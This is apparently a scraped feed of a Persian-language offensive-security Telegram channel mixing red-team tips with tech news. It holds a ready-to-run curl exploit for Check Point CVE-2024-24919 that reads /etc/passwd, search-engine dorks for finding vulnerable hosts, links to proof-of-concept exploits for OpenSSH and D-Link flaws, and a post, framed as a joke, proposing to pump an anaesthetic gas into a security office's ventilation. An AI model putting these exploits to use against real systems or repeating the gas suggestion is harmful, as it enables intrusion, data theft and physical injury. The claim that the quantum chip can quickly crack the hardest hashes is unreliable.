چنتا کتاب دیگه هم که تو بحث Post Exploit و Red team شاید دنبالشون باشین
خودم برسی نکردم همرو
@matitanium
خودم برسی نکردم همرو
@matitanium
❤5👍1
حمله فیزیکی به یک سازمان که حراستش خیلی گیره؟
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
2واحد دسفلوران در سیستم تهویه هوا اتاق حراست تزریق کنید!✅
😈10👍1
CVE-2024–24919
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
. Dorks
Hunter: /product.name="Check Point SSL Network Extender"
FOFA: noscript="Check Point SSL Network Extender"
SHODAN: http.noscript="Check Point SSL Network Extender"
@matitanium
CyberSecurity
CVE-2024–24919 . Dorks Hunter: /product.name="Check Point SSL Network Extender" FOFA: noscript="Check Point SSL Network Extender" SHODAN: http.noscript="Check Point SSL Network Extender" @matitanium
Exploit
curl -k -X POST "https://{ip}/clients/MyCRL" \ -H "Host: {ip}/" \ -H "User-Agent: Mozilla/5.0 (Macintosh:@Matitanium; Intel Mac OS X 10.15; rv:126.0) Gecko/20100101 Firefox/126.0" \ -H "Te: trailers" \ -H "Dnt: 1" \ -H "Connection: keep-alive" \ -H "Content-Length: 48" \ --data "aCSHELL/../../../../../../../../../../../etc/passwd"استفاده از NMAP برای برسی ساختار AD و Domain
دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389
کامند استفاده شده:
nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>
@matitanium
دامین کنترل رو پورت اسکن کنید و پروتکل LDAP رو پیدا کنید
معمولا پورت 389
کامند استفاده شده:
nmap -p389 -sV -n — noscript ldap-rootdse <DC-IP>
@matitanium
👌4👎1
CVE-2024-6387
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10
فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش
#Exploit
https://github.com/asterictnl-lvdw/CVE-2024-6387
@matitanium
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server
#version
SSH-2.0-OpenSSH_8.9p1
Ubuntu-3ubuntu0.10
فقط روی SSH سرور ها با معماری 32 بیت قابل اجرا هستش
#Exploit
https://github.com/asterictnl-lvdw/CVE-2024-6387
@matitanium
GitHub
GitHub - Karmakstylez/CVE-2024-6387: Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387)
Remote Unauthenticated Code Execution Vulnerability in OpenSSH server (CVE-2024-6387) - Karmakstylez/CVE-2024-6387
👍3
This media is not supported in your browser
VIEW IN TELEGRAM
کلی از سازمان ها اینجوری فایروال کانفیگ میکنن 😂😂
تصور کنید سازمان ها از فایروال 2 سال پیش استفاده میکنن و اپدیت نشده
@matitanium
تصور کنید سازمان ها از فایروال 2 سال پیش استفاده میکنن و اپدیت نشده
@matitanium
👍5😐3👌1🗿1
This media is not supported in your browser
VIEW IN TELEGRAM
مفهوم گلوگاه کارت گرافیک 😂
وقتی که حداکثر توان CPU بسیار کمتر از GPU هست و کارت گرافیک نمیتونه به حداکثر قدرتش برسه
@matitanium
وقتی که حداکثر توان CPU بسیار کمتر از GPU هست و کارت گرافیک نمیتونه به حداکثر قدرتش برسه
@matitanium
👍4🔥1👌1
CVE-2024-10914 : D-Link Network Attached Storage 'name'
DNS-3$versions - Unauthenticated OS Command Injection (RCE)
POC : https://github.com/redspy-sec/D-Link
@matitanium
DNS-3$versions - Unauthenticated OS Command Injection (RCE)
POC : https://github.com/redspy-sec/D-Link
@matitanium
#خبر
‼️ هوش مصنوعی در باگ بانتی !
اخیرا یک مدل هوش مصنوعی به نام XBOW به مدت ۳ ماه بر روی تارگت های واقعی در پلتفرمباگ بانتی هکروان فعالیت کرده است که توانسته در ranking/leader board هانتر های کشور آمریکا رتبه 11 را کسب کند !
طبق عکس هایی که خود تیم xbow در X منتشر کردند میتوانید خطرات آسیب پذیری های گزارش شده را در تصاویر مشاهده کنید که خیلی خوب است.
💬 بنظرتون هوش مصنوعی چه تغییراتی قراره در فیلد امنیت سایبری ایجاد کنه ؟ آیا قراره کلا تصاحب کنه و یا آیا قراره فیلد های امنیت جدید یا آسیب پذیری های جدیدی کشف بشوند ؟!
@matitanium
‼️ هوش مصنوعی در باگ بانتی !
اخیرا یک مدل هوش مصنوعی به نام XBOW به مدت ۳ ماه بر روی تارگت های واقعی در پلتفرمباگ بانتی هکروان فعالیت کرده است که توانسته در ranking/leader board هانتر های کشور آمریکا رتبه 11 را کسب کند !
طبق عکس هایی که خود تیم xbow در X منتشر کردند میتوانید خطرات آسیب پذیری های گزارش شده را در تصاویر مشاهده کنید که خیلی خوب است.
💬 بنظرتون هوش مصنوعی چه تغییراتی قراره در فیلد امنیت سایبری ایجاد کنه ؟ آیا قراره کلا تصاحب کنه و یا آیا قراره فیلد های امنیت جدید یا آسیب پذیری های جدیدی کشف بشوند ؟!
@matitanium
👍6
Media is too big
VIEW IN TELEGRAM
#Google #Willow #Quantum #Chip
گوگل اخیرا تراشه کوانتومی جدیدی به نام (Willow) معرفی کرده است که با ۱۰۵ کیوبیت، پیشرفتی مهم در محاسبات کوانتومی محسوب میشود. این تراشه قادر است مسائلی را در عرض پنج دقیقه حل کند که سریع ترین ابر رایانههای کنونی برای حل آنها به زمانی بیش از عمر جهان نیاز دارند.
تراشه Willow با کاهش نرخ خطاها در مقیاس بزرگتر، به چالشی اساسی در این حوزه پاسخ میدهد و نشان میدهد که با افزایش تعداد کیوبیتها، دقت محاسبات نیز بهبود مییابد.
گوگل ادعا میکند که Willow میتواند مسائل دنیای واقعی، مانند شبیه سازی مولکول ها برای کشف دارو های جدید و طراحی باتری های قدرتمندتر، را حل کند. این پیشرفت به کاربردهای تجاری محاسبات کوانتومی بسیار نزدیکتر شده است.
سیستم های رمزنگاری مدرن (مانند RSA، AES و ECC) به قدرت محاسباتی کلاسیک وابسته اند و امنیت آنها بر پایه زمان مورد نیاز برای شکستن کلیدها است. تراشههای کوانتومی مانند Willow، با استفاده از الگوریتم (Shor)، میتوانند در زمان کوتاهی کلیدهای رمزنگاری سنتی را شکسته و دادهها را در معرض خطر قرار دهند.
گوگل اخیرا تراشه کوانتومی جدیدی به نام (Willow) معرفی کرده است که با ۱۰۵ کیوبیت، پیشرفتی مهم در محاسبات کوانتومی محسوب میشود. این تراشه قادر است مسائلی را در عرض پنج دقیقه حل کند که سریع ترین ابر رایانههای کنونی برای حل آنها به زمانی بیش از عمر جهان نیاز دارند.
تراشه Willow با کاهش نرخ خطاها در مقیاس بزرگتر، به چالشی اساسی در این حوزه پاسخ میدهد و نشان میدهد که با افزایش تعداد کیوبیتها، دقت محاسبات نیز بهبود مییابد.
گوگل ادعا میکند که Willow میتواند مسائل دنیای واقعی، مانند شبیه سازی مولکول ها برای کشف دارو های جدید و طراحی باتری های قدرتمندتر، را حل کند. این پیشرفت به کاربردهای تجاری محاسبات کوانتومی بسیار نزدیکتر شده است.
سیستم های رمزنگاری مدرن (مانند RSA، AES و ECC) به قدرت محاسباتی کلاسیک وابسته اند و امنیت آنها بر پایه زمان مورد نیاز برای شکستن کلیدها است. تراشههای کوانتومی مانند Willow، با استفاده از الگوریتم (Shor)، میتوانند در زمان کوتاهی کلیدهای رمزنگاری سنتی را شکسته و دادهها را در معرض خطر قرار دهند.
👍4
CyberSecurity
#Google #Willow #Quantum #Chip گوگل اخیرا تراشه کوانتومی جدیدی به نام (Willow) معرفی کرده است که با ۱۰۵ کیوبیت، پیشرفتی مهم در محاسبات کوانتومی محسوب میشود. این تراشه قادر است مسائلی را در عرض پنج دقیقه حل کند که سریع ترین ابر رایانههای کنونی برای حل آنها…
با وجود این تراشه میشه سخت ترین هش ها یا الگوریتم هارو با سرعت بالا کرک کرد👌
هرجایی که کارت میکشید مراقب باشید! ❗️
اسکیمرها، دستگاههایی که بهراحتی شبیه کارتخوان هستند، در ایران رواج پیدا کردهاند.
پس از کشیدن کارت و وارد کردن رمز، اطلاعات کارت شما به همراه رمز داخل این دستگاهها کپی میشود.
⚠️ چطور اسکیمر را تشخیص دهیم؟
سارق معمولاً بعد از کارت کشیدن و وارد کردن رمز میگوید:
“دستگاه آنتن ندارد” یا “خراب شده”، و درخواست میکند مبلغ را نقدی پرداخت کنید.
اگر با چنین شرایطی مواجه شدید:
1️⃣ آرامش خود را حفظ کنید.
2️⃣ بدون هیچ اقدامی از محل دور شوید.
3️⃣ موضوع را به ارگانهای امنیتی اطلاع دهید.
امن بمانید.
@matitanium
اسکیمرها، دستگاههایی که بهراحتی شبیه کارتخوان هستند، در ایران رواج پیدا کردهاند.
پس از کشیدن کارت و وارد کردن رمز، اطلاعات کارت شما به همراه رمز داخل این دستگاهها کپی میشود.
⚠️ چطور اسکیمر را تشخیص دهیم؟
سارق معمولاً بعد از کارت کشیدن و وارد کردن رمز میگوید:
“دستگاه آنتن ندارد” یا “خراب شده”، و درخواست میکند مبلغ را نقدی پرداخت کنید.
اگر با چنین شرایطی مواجه شدید:
1️⃣ آرامش خود را حفظ کنید.
2️⃣ بدون هیچ اقدامی از محل دور شوید.
3️⃣ موضوع را به ارگانهای امنیتی اطلاع دهید.
امن بمانید.
@matitanium
🔥6🗿2❤1👌1